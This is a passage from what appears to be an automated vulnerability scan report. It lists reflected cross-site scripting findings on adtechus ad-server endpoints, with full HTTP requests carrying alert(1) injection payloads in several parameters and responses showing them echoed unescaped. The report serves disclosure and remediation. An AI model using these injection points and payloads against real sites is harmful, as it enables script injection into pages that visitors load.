User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=223547500743A002098EB099848151AA; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 15:59:33 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
__ADXPOSE_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_W25t6coj820hSGmI5ca84<script>alert(1)</script>e6063e28591".replace(/[^\w\d]/g,""),"W25t6coj820hSGmI5ca84<script>
...[SNIP]...

4.4. http://adserver.adtechus.com/addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [kvq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126

Issue detail

The value of the kvq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bb3a'-alert(1)-'39269acb9b9 was submitted in the kvq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=2bb3a'-alert(1)-'39269acb9b9 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/5132/1229906/0/225/AdId=1423870;BnId=9;itime=921573158;nodecode=yes;link=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=2bb3a'-alert(1)-'39269acb9b9http://www.autotrader.com/hornav/trader/index.jsp?LNX=SYCVIDSCI728" target="_blank">
...[SNIP]...

4.5. http://adserver.adtechus.com/addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5c4f'-alert(1)-'8df45306b31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=&e5c4f'-alert(1)-'8df45306b31=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/5132/1229906/0/225/AdId=1423870;BnId=10;itime=921573573;nodecode=yes;link=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=&e5c4f'-alert(1)-'8df45306b31=1http://www.autotrader.com/hornav/trader/index.jsp?LNX=SYCVIDGLITT728" target="_blank">
...[SNIP]...

4.6. http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH [alias parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5242.1/1199874/0/16/ADTECH

Issue detail

The value of the alias request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db26e'-alert(1)-'0d3ee1d5280 was submitted in the alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=225700573b6576db26e'-alert(1)-'0d3ee1d5280 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 302

document.write('<a href="http://adserver.adtechus.com/?adlink/5242/1201101/0/16/AdId=-3;BnId=0;itime=920483518;key=225700573b6576db26e'-alert(1)-'0d3ee1d5280;" target=_top><img src="http://aka-cdn-ns.
...[SNIP]...

4.7. http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5242.1/1199874/0/16/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87d4c'-alert(1)-'a66e2a6ecfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=225700573b6576&87d4c'-alert(1)-'a66e2a6ecfb=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 305

document.write('<a href="http://adserver.adtechus.com/?adlink/5242/1201101/0/16/AdId=-3;BnId=0;itime=920484945;key=225700573b6576&87d4c'-alert(1)-'a66e2a6ecfb=1;" target=_top><img src="http://aka-cdn-
...[SNIP]...

4.8. http://adserver.adtechus.com/addyn/3.0/5242.1/1200349/0/225/ADTECH [alias parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5242.1/1200349/0/225/ADTECH

Issue detail

The value of the alias request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d27a"-alert(1)-"23d787d5a6f was submitted in the alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5242.1/1200349/0/225/ADTECH;alias=InformationWeek_Software_HP_Top_728x90;key=225700573b65766d27a"-alert(1)-"23d787d5a6f HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1454

document.write("<IFRAME SRC=\"http://ad.doubleclick.net/adi/N6626.5087.INFORMATIONWEEK.COM/B5075704.2;sz=728x90;click=http%3A//adserver.adtechus.com/adlink%2F5242%2F1201431%2F0%2F225%2FAdId%3D1363226%
...[SNIP]...
<A HREF=\"http://adserver.adtechus.com/adlink/5242/1201431/0/225/AdId=1363226;BnId=1;itime=920484416;key=225700573b65766d27a"-alert(1)-"23d787d5a6f;nodecode=yes;link=http://ad.doubleclick.net/jump/N6626.5087.INFORMATIONWEEK.COM/B5075704.2;abr=!ie4;abr=!ie5;sz=728x90;ord=920484416?\">
...[SNIP]...

4.9. http://adserver.adtechus.com/addyn/3.0/5242.1/1200349/0/225/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5242.1/1200349/0/225/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b1ea"-alert(1)-"2fbf835ceb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5242.1/1200349/0/225/ADTECH;alias=InformationWeek_Software_HP_Top_728x90;key=225700573b6576&1b1ea"-alert(1)-"2fbf835ceb6=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19251

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5242/1201431/0/225/AdId=1283446;BnId=5;itime=920485366;key=225700573b6576&1b1ea"-alert(1)-"2fbf835ceb6=1;nodecode=yes;link=") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserv
...[SNIP]...

4.10. http://adserver.adtechus.com/addyn/3.0/5242.1/1200449/0/225/ADTECH [alias parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5242.1/1200449/0/225/ADTECH

Issue detail

The value of the alias request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea3c6'-alert(1)-'ba2d61c4899 was submitted in the alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Software_HP_Bottom_728x90;key=225700573b6576ea3c6'-alert(1)-'ba2d61c4899 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 328

document.write('<a href="http://adserver.adtechus.com/?adlink/5242/1200449/0/225/AdId=1117512;BnId=1;itime=920484112;key=225700573b6576ea3c6'-alert(1)-'ba2d61c4899;" target=_top><img src="http://aka-c
...[SNIP]...

4.11. http://adserver.adtechus.com/addyn/3.0/5242.1/1200449/0/225/ADTECH [alias parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5242.1/1200449/0/225/ADTECH

Issue detail

The value of the alias request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c264a"-alert(1)-"99d36684df2 was submitted in the alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Software_HP_Bottom_728x90;key=225700573b6576c264a"-alert(1)-"99d36684df2 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1135

document.write("<iframe src=\"http://view.atdmt.com/00A/iview/285954474/direct/01/920483555?click=http://adserver.adtechus.com/adlink/5242/1200449/0/225/AdId=1347642;BnId=1;itime=920483555;key=225700573b6576c264a"-alert(1)-"99d36684df2;nodecode=yes;link=\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" topmargin=\"0\" leftmargin=\"0\" allowtransparency=\"true\" width=\"728\" height=\"90\">
...[SNIP]...

4.12. http://adserver.adtechus.com/addyn/3.0/5242.1/1200449/0/225/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5242.1/1200449/0/225/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72594'-alert(1)-'805f5bcf179 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Software_HP_Bottom_728x90;key=225700573b6576&72594'-alert(1)-'805f5bcf179=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1144

document.write("<iframe src=\"http://view.atdmt.com/00A/iview/285954474/direct/01/920484180?click=http://adserver.adtechus.com/adlink/5242/1200449/0/225/AdId=1347642;BnId=1;itime=920484180;key=2257005
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/5242/1200449/0/225/AdId=1347642;BnId=1;itime=920484180;key=225700573b6576&72594'-alert(1)-'805f5bcf179=1;nodecode=yes;link=http://clk.redcated/00A/go/285954474/direct/01/" target="_blank">
...[SNIP]...

4.13. http://adserver.adtechus.com/addyn/3.0/5242.1/1200533/0/16/ADTECH [alias parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5242.1/1200533/0/16/ADTECH

Issue detail

The value of the alias request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5308d'-alert(1)-'e15412e718f was submitted in the alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5242.1/1200533/0/16/ADTECH;alias=InformationWeek_Software_HP_Pagepeel_1x1;key=225700573b65765308d'-alert(1)-'e15412e718f HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 302

document.write('<a href="http://adserver.adtechus.com/?adlink/5242/1199489/0/16/AdId=-3;BnId=0;itime=920484951;key=225700573b65765308d'-alert(1)-'e15412e718f;" target=_top><img src="http://aka-cdn-ns.
...[SNIP]...

4.14. http://adserver.adtechus.com/addyn/3.0/5242.1/1200533/0/16/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5242.1/1200533/0/16/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 718fe'-alert(1)-'ef1ab54d48e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5242.1/1200533/0/16/ADTECH;alias=InformationWeek_Software_HP_Pagepeel_1x1;key=225700573b6576&718fe'-alert(1)-'ef1ab54d48e=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 305

document.write('<a href="http://adserver.adtechus.com/?adlink/5242/1199489/0/16/AdId=-3;BnId=0;itime=920484184;key=225700573b6576&718fe'-alert(1)-'ef1ab54d48e=1;" target=_top><img src="http://aka-cdn-
...[SNIP]...

4.15. http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fadbd"><script>alert(1)</script>a72a2aad66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframefadbd"><script>alert(1)</script>a72a2aad66/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 395

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addynfadbd"><script>alert(1)</script>a72a2aad66/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;adiframe=y;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?targ
...[SNIP]...

4.16. http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4411"><script>alert(1)</script>ac47f18584 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0e4411"><script>alert(1)</script>ac47f18584/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
